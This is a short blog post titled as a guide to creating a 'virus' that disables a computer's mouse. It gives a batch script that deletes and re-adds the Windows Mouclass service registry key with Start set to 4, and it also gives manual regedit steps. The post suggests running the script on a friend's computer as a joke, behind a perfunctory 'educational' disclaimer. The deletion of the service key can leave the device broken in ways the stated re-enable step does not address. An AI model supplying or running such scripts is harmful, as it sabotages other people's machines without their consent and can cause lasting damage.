How to create a virus that disable mouse
Before i explain you the methods on how to create a virus that disable mouse, it can effect your pc or laptop so do that at your own risk. Today i will give you a code , using it you can disable your mouse you can use it for your friend’s computer and make a fun.
WARNING:All hacking tricks which are shown in Blogotik.com are only for educational and fun purpose . Do not use it illegally . We are not responsible for any kind of matter which may create after your use of trick . Use it on your own risk .
The Following two methods can disable your mouse:
Method 1:
Just paste below code to notepad and save it with .bat extension . ( .bat extension is required )rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————
Method 2:
Method 1 works directly . But if you want to disable mouse manually then here is a method.
- Open run ( windows + R )
- type regedit
- After hittin enter new window will come up now follow below given flow..
- HKEY_LOCAL_MACHINE -> system -> CurrentControlSet -> Services -> Mouclass
- now click on start and new window will open ..
- In value data box remove 3 and type 4..
- Your mouse will disable..
- To re-enable change value data with 3
In the section of services there are lots of stuffs . You can disable or enable numbers of devices which are used in computer ..
No comments:
Post a Comment